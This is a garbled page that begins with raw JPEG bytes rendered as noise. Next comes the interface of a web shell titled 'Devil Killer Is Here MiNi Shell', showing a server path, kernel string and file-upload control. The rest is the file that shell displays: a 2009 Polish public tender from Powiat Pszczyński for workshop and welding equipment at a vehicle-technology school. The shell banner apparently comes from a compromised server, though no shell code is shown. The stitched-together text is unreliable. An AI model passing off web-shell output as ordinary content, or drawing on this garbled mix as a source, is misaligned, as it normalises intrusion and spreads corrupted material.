JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090904/147557-N-2009.html

<p class="kh_header"><b>Pszczyna: Dostawa wyposażenia pracowni szkolnictwa   zawodowego w Zespole Szkół Samochodowych w Pszczynie.</b><br>
<b>Numer ogłoszenia: 147557 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pszczyński , ul. 3 Maja 10, 43-200 Pszczyna, woj. śląskie, tel. 032 4492300, 032 4492399, faks 032 4492345.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pszczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia pracowni szkolnictwa   zawodowego w Zespole Szkół Samochodowych w Pszczynie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Dostawa wyposażenia pracowni szkolnictwa   zawodowego w Zespole Szkół Samochodowych w Pszczynie.
2.	Ze względu na charakter przedmiotu dostawy całość zamówienia podzielono na dziewięć odrębnych części :
   
Część I: DIAGNOSTYKA - dostawa, montaż, uruchomienie
A. SAMOCHODOWE  URZĄDZENIA  DIAGNOSTYCZNE.
A.1. Podnośnik diagnostyczny 4-kolumnowy.		1 szt.
A.2. Przyrząd do kontroli i regulacji geometrii kół.		1 szt.
A.3. Tester diagnostyczny.					1 szt.
B. INSTALACJA  SPRĘŻONEGO  POWIETRZA.
B.1. Kompresor olejowy.					2 szt.
B.2. Elementy instalacji.					2 kpl.
C. SPRZĘT  KOMPUTEROWY.
C.1. Laptop.							1 szt.
C.2. Drukarka laserowa.					1 szt.

Część II: WYPOSAŻENIE  SPAWALNI - dostawa, montaż, uruchomienie
B.1. Odciągi pyłów i dymów spawalniczych: stanowiska spawalnicze	
B.1.a. Pracownia spajania metali - GAZ		1 kpl.
B.1.b. Pracownia spajania metali -  TIG, elektroda.	1 kpl.
B.2. Kurtyny spawalnicze.				          18 szt.
B.3. Stół montażowo - spawalniczy.				5 szt.

Część III:   URZĄDZENIA  DO SPAWANIA - dostawa, montaż, uruchomienie
A. Urządzenia do spawania.
A.1. Półautomat spawalniczy MAG 160A			3 szt.
A.2. Półautomat spawalniczy MAG 300A			1 szt.
A.3. Półautomat spawalniczy TIG AC/DC.			1 szt.
A.4. Urządzenie do spawania elektrodą otuloną 150A	1 szt.
A.5. Urządzenie do spawania elektrodą otuloną 100A	1 szt.
 	A.6. Sprzęt do spawania gazowego				2 kpl.
B. Środki BHP - Ochrona indywidualna.
B.1. Środki BHP spawacza.					5 kpl.

Część IV:   MEBLE WARSZTATOWE - dostawa i montaż
1.	Szafa metalowa.						9 szt.
2.	Szafa narzędziowa metalowa.			          17 szt.
3.	Stolik warsztatowy metalowy mały.			          10 szt.
4.	Regał metalowy						4 szt.

Część V:  NARZĘDZIA   ŚLUSARSKIE - dostawa
1.	Obciągacz diamentowy do ściernic.				2 szt.
2.	Kleszcze kątowe do rur.					3 szt.
3.	Klucz nastawny z podziałką.					1 szt.
4.	Imadło ślusarskie. 					          27 szt.
5.	Ściągacz trójramienny z regulowanym rozstawem.		1 szt.
6.	Zestaw pilników uniwersalnych.				5 kpl.
7.	Pilniki warsztatowe.					          27 szt.
8.	Nożyce do blachy z przełożeniem.				2 szt.
9.	Kątownik płaski ze stopką o dokładności 2.			4 szt.
10.	Kątownik 45o.							2 szt.
11.	Rysiki traserskie.						4 szt.
12.	Cyrkiel warsztatowy.						2 szt.
13.	Ścisk kątowy.							1 szt.
14.	Imadło maszynowe do wiertarek, mocowanie ręczne.	1 szt.
15.	Suwmiarka z noniuszem 1/50 i okrągłym głębokościomierzem.	3 szt.
16.	Suwmiarka.							3 szt.
17.	Zestaw kluczy oczkowo-płaskich.				2 kpl.
18.	Szlifierka kątowa 520W					2 szt.
19.	Szlifierka kątowa 1250W`					1 szt.
20.	Wiertarko-wkrętarka: 2-biegowa, akumulatorowa.		1 szt.
21.	Szlifierka prosta.						1 szt.
22.	Wiertarka udarowa; 2-biegowa.				1 szt.
23.	Obrotowe kły tokarskie.					6 szt.
24.	Uchwyty wiertarskie z wieńcem zębatym z kluczem.	4 szt.
25.	Cylindryczne chwyty trzpieniowe.				8 szt.
26.	Pojemniki plastikowe na złom i wióry.			7 szt.
27.	Wózek platformowy uniwersalny, metalowy.		2 szt.

Część VI:  MASZYNY  ŚLUSARSKIE  I  DO  OBRÓBKI  SKRAWANIEM - dostawa,  montaż i uruchomienie
1.	Szlifierka stołowa dwutarczowa.				4 szt.
2.	Prasa hydrauliczna wolnostojąca.				1 szt.
3.	Przecinarka taśmowa.						1 szt.
4.	Giętarka - krawędziarka.					1 szt.
5.	Gilotyna ręczna do blach.					1 szt.
6.	Wiertarka promieniowa.					1 szt.
7.	Wiertarka wieloczynnościowa.				1 szt.
8.	 Wiertarka słupowa.						1 szt.
9.-10. Tokarka uproszczona					2 szt.
11.	Frezarka.							1 szt.
Część VII. 	STANOWISKA  DEMONSTRACYJNE - dostaw i montaż
A.	Szkoleniowe stanowiska demonstracyjne.
A.1. System zintegrowany typu MOTRONIC ML4.1				1 szt.
A.2. Stanowisko funkcjonalne systemu sterowania elektronicznego 
      zasilania silnika Diesel EDC.							1 szt.
A.3. Stanowisko funkcjonalne systemu regulacji siły hamowania ABS/ASR.	1 szt.
A.4. Zestaw czujników systemów elektrycznych pojazdów.			1 szt.
A.5. System zintegrowany typu L-Jetronic.						1 szt.
B. e-panele szkoleniowe
B.1. Zestaw panelowy Podstawy elektroniki i elektrotechniki pojazdowej.	4 kpl.

Część VII. 	REMONT  OBRABIAREK						7 szt. 

Część IX. 	REMONT  STOŁÓW  WARSZTATOWYCH
1. stół metalowy dwustanowiskowy						          16 szt.
2. stół metalowy jednostanowiskowy						3 szt.


3. Szczegółowy zakres przedmiotu zamówienia dla poszczególnych części zawiera załącznik Nr 2 do SIWZ -SZCZEGÓŁOWY OPIS  PRZEDMIOTU  ZAMÓWIENIA - ZAKRES DOSTAWY..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.11.40.00-1, 50.85.00.00-8, 18.14.20.00-6, 18.14.30.00-3, 18.44.35.00-1, 30.21.31.00-6, 30.23.21.10-8, 34.32.41.00-5, 34.32.62.00-0, 34.32.81.00-3, 39.15.00.00-8, 39.16.21.00-6, 39.16.22.00-7, 42.62.10.00-5, 42.62.30.00-9, 42.63.30.00-2, 42.63.61.00-4, 43.83.00.00-0, 45.33.12.10-1, 42.66.20.00-4, 50.53.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział wykonawcy, którzy spełniają następujące warunki:

A.	Spełniają warunki określone w art. 22 ust.1 UPZP.
a.	posiadają uprawnienia do wykonywania określonej w przedmiocie zamówienia działalności lub czynności
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia 
c.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
d.	nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych.
B.	Ocena spełnienia warunków udziału w postępowaniu:
1.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż Wykonawca spełnia wyżej wymienione warunki.
2.	Zamawiający wezwie w trybie art. 26 ust.3 Wykonawców:
a.	którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 UPZP;
b.	którzy nie złożyli pełnomocnictw;
c.	którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 UPZP, zawierające błędy;
d.	którzy złożyli wadliwe pełnomocnictwa
do ich złożenia w wyznaczonym terminie, chyba, że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. 
3.	Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać  spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy i usługi wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
C.	Dopuszcza się składanie ofert wspólnych: dwóch lub większej ilości podmiotów, przy zachowaniu następujących warunków: 
1.	Jeden z podmiotów zostanie wyznaczony jako odpowiedzialny i jego upoważnienie będzie udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli pozostałych podmiotów.
2.	Prawomocne zaświadczenia, oświadczenia i dokumenty dotyczące potwierdzenia spełnienia warunków określonych w punkcie IX oraz pozostałe elementy oferty muszą być podpisane przez osobę lub osoby wyznaczone jako odpowiedzialne, których upoważnienie będzie udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli pozostałych podmiotów
3.	Wszystkie podmioty będą solidarnie odpowiadały prawnie za realizację umowy.
4.	Przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może wezwać do przedstawienia umowy regulującej współpracę tych Wykonawców..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta winna zawierać następujące oświadczenia i dokumenty:

1.	Wypełniony i podpisany formularz ofertowy stanowiący załącznik nr 1 do SIWZ.
2.	Wypełnione i podpisane oświadczenia o spełnieniu warunków udziału w postępowaniu (w zakresie art. 24 ust.1-4 i art. 22. ust. 1 ustawy PZP) zgodnie z załącznikiem nr 3 do SIWZ.
3.	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed terminem składania ofert.
4.	Wyceny jednostkowej wszystkich elementów części zamówienia na druku zakresu dostawy (załącznik nr 2 do SIWZ), odpowiednio dla każdej z części której oferta dotyczy. 

UWAGA !
Zgodnie z art. 3 ust. 1 pkt 1 ustawy z 5 lipca 2001r. o cenach (Dz. U. Nr 97 poz. 1050 ze zm.), do którego odsyła art. 2 pkt 1 ustawy Prawo Zamówień Publicznych - ceną jest wartość wyrażona w jednostkach pieniężnych, którą kupujący jest obowiązany zapłacić przedsiębiorcy za towar lub usługę. Analogicznie kwestia ta jest regulowana w odniesieniu do cen jednostkowych. Zgodnie z ustawą  z dnia  7 lipca 1994r, o denominacji złotego (Dz.U. Nr 84 poz. 386 ze zm.) od 1 stycznia 1995r. polską jednostką pieniężną jest (art. 1) złoty, który dzieli się na 100 groszy. Regulacja ta wynika również z art. 31 ustawy z 29 sierpnia 1997r. o Narodowym Banku Polskim (Dz.U. z 2005r. Nr 1, poz. 2), w myśl którego znakami pieniężnymi Rzeczpospolitej Polskiej są banknoty i monety opiewające na złote i grosze. 
Oznacza to, iż rozliczanie wykonanych robót może nastąpić wyłącznie z uwzględnieniem wymienionych regulacji, a to powoduje, że ceny za roboty muszą być wyrażone w obowiązującej w Polsce jednostce pieniężnej. Uwzględniając powyższe regulacje cena oferty musi być podana w złotych i w groszach tzn. w liczbie z dwoma miejscami po przecinku. Oznaczenie cen w inny sposób (3, 4 itd. miejsc po przecinku) spowoduje, iż w tej części oferta będzie niezgodna z polskim systemem płatniczym wskazanym w powołanych wyżej ustawach i na podstawie art. 89 ust. 1 pkt. 1 ustawy Prawo zamówień Publicznych podlegać będzie odrzuceniu. 
Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Polski.
Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605), uwzględniający zmiany wprowadzone rozporządzeniem Prezesa Rady Ministrów z dnia 16 października 2008r. zmieniającym rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 188, poz. 1155)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.przetargi.powiat.pszczyna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pszczynie, parter pok. 5 Wydział Zamówień Publicznych lub przesyłką pocztową (poleconą) na adres: Starostwo Powiatowe w Pszczynie,    ul. 3 Maja 10  43-200 Pszczyna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Pszczynie, I piętro pok. 35 Sekretariat lub przesyłką pocztową (poleconą) na adres: Starostwo Powiatowe w Pszczynie,                     ul. 3 Maja10  43-200 Pszczyna.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Śląskiego na lata 2007-2013 -działanie 8.2 Infrastruktura placówek oświaty..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DIAGNOSTYKA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I: DIAGNOSTYKA - dostawa, montaż, uruchomienie
A. SAMOCHODOWE  URZĄDZENIA  DIAGNOSTYCZNE.
A.1. Podnośnik diagnostyczny 4-kolumnowy.		1 szt.
A.2. Przyrząd do kontroli i regulacji geometrii kół.		1 szt.
A.3. Tester diagnostyczny.					1 szt.
B. INSTALACJA  SPRĘŻONEGO  POWIETRZA.
B.1. Kompresor olejowy.					2 szt.
B.2. Elementy instalacji.					2 kpl.
C. SPRZĘT  KOMPUTEROWY.
C.1. Laptop.							1 szt.
C.2. Drukarka laserowa.					1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.32.62.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WYPOSAŻENIE  SPAWALNI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II: WYPOSAŻENIE  SPAWALNI - dostawa, montaż, uruchomienie
B.1. Odciągi pyłów i dymów spawalniczych: stanowiska spawalnicze	
B.1.a. Pracownia spajania metali - GAZ		1 kpl.
B.1.b. Pracownia spajania metali -  TIG, elektroda.	1 kpl.
B.2. Kurtyny spawalnicze.				          18 szt.
B.3. Stół montażowo - spawalniczy.				5 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.12.10-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> URZĄDZENIA  DO SPAWANIA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III:   URZĄDZENIA  DO SPAWANIA - dostawa, montaż, uruchomienie
A. Urządzenia do spawania.
A.1. Półautomat spawalniczy MAG 160A			3 szt.
A.2. Półautomat spawalniczy MAG 300A			1 szt.
A.3. Półautomat spawalniczy TIG AC/DC.			1 szt.
A.4. Urządzenie do spawania elektrodą otuloną 150A	1 szt.
A.5. Urządzenie do spawania elektrodą otuloną 100A	1 szt.
 	A.6. Sprzęt do spawania gazowego				2 kpl.
B. Środki BHP - Ochrona indywidualna.
B.1. Środki BHP spawacza.					5 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.66.20.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MEBLE WARSZTATOWE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV:   MEBLE WARSZTATOWE - dostawa i montaż
1.	Szafa metalowa.						9 szt.
2.	Szafa narzędziowa metalowa.			          17 szt.
3.	Stolik warsztatowy metalowy mały.			          10 szt.
4.	Regał metalowy						4 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> NARZĘDZIA   ŚLUSARSKIE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V:  NARZĘDZIA   ŚLUSARSKIE - dostawa
1.	Obciągacz diamentowy do ściernic.				2 szt.
2.	Kleszcze kątowe do rur.					3 szt.
3.	Klucz nastawny z podziałką.					1 szt.
4.	Imadło ślusarskie. 					          27 szt.
5.	Ściągacz trójramienny z regulowanym rozstawem.		1 szt.
6.	Zestaw pilników uniwersalnych.				5 kpl.
7.	Pilniki warsztatowe.					          27 szt.
8.	Nożyce do blachy z przełożeniem.				2 szt.
9.	Kątownik płaski ze stopką o dokładności 2.			4 szt.
10.	Kątownik 45o.							2 szt.
11.	Rysiki traserskie.						4 szt.
12.	Cyrkiel warsztatowy.						2 szt.
13.	Ścisk kątowy.							1 szt.
14.	Imadło maszynowe do wiertarek, mocowanie ręczne.	1 szt.
15.	Suwmiarka z noniuszem 1/50 i okrągłym głębokościomierzem.	3 szt.
16.	Suwmiarka.							3 szt.
17.	Zestaw kluczy oczkowo-płaskich.				2 kpl.
18.	Szlifierka kątowa 520W					2 szt.
19.	Szlifierka kątowa 1250W`					1 szt.
20.	Wiertarko-wkrętarka: 2-biegowa, akumulatorowa.		1 szt.
21.	Szlifierka prosta.						1 szt.
22.	Wiertarka udarowa; 2-biegowa.				1 szt.
23.	Obrotowe kły tokarskie.					6 szt.
24.	Uchwyty wiertarskie z wieńcem zębatym z kluczem.	4 szt.
25.	Cylindryczne chwyty trzpieniowe.				8 szt.
26.	Pojemniki plastikowe na złom i wióry.			7 szt.
27.	Wózek platformowy uniwersalny, metalowy.		2 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 43.83.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MASZYNY  ŚLUSARSKIE  I  DO  OBRÓBKI  SKRAWANIEM.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI:  MASZYNY  ŚLUSARSKIE  I  DO  OBRÓBKI  SKRAWANIEM - dostawa,  montaż i uruchomienie
1.	Szlifierka stołowa dwutarczowa.				4 szt.
2.	Prasa hydrauliczna wolnostojąca.				1 szt.
3.	Przecinarka taśmowa.						1 szt.
4.	Giętarka - krawędziarka.					1 szt.
5.	Gilotyna ręczna do blach.					1 szt.
6.	Wiertarka promieniowa.					1 szt.
7.	Wiertarka wieloczynnościowa.				1 szt.
8.	 Wiertarka słupowa.						1 szt.
9.-10. Tokarka uproszczona					2 szt.
11.	Frezarka.							1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.62.10.00-5, 42.62.30.00-9, 42.63.30.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> STANOWISKA  DEMONSTRACYJNE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VII. 	STANOWISKA  DEMONSTRACYJNE - dostaw i montaż
A.	Szkoleniowe stanowiska demonstracyjne.
A.1. System zintegrowany typu MOTRONIC ML4.1				1 szt.
A.2. Stanowisko funkcjonalne systemu sterowania elektronicznego 
      zasilania silnika Diesel EDC.							1 szt.
A.3. Stanowisko funkcjonalne systemu regulacji siły hamowania ABS/ASR.	1 szt.
A.4. Zestaw czujników systemów elektrycznych pojazdów.			1 szt.
A.5. System zintegrowany typu L-Jetronic.						1 szt.
B. e-panele szkoleniowe
B.1. Zestaw panelowy Podstawy elektroniki i elektrotechniki pojazdowej.	4 kpl..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> REMONT  OBRABIAREK.</p>
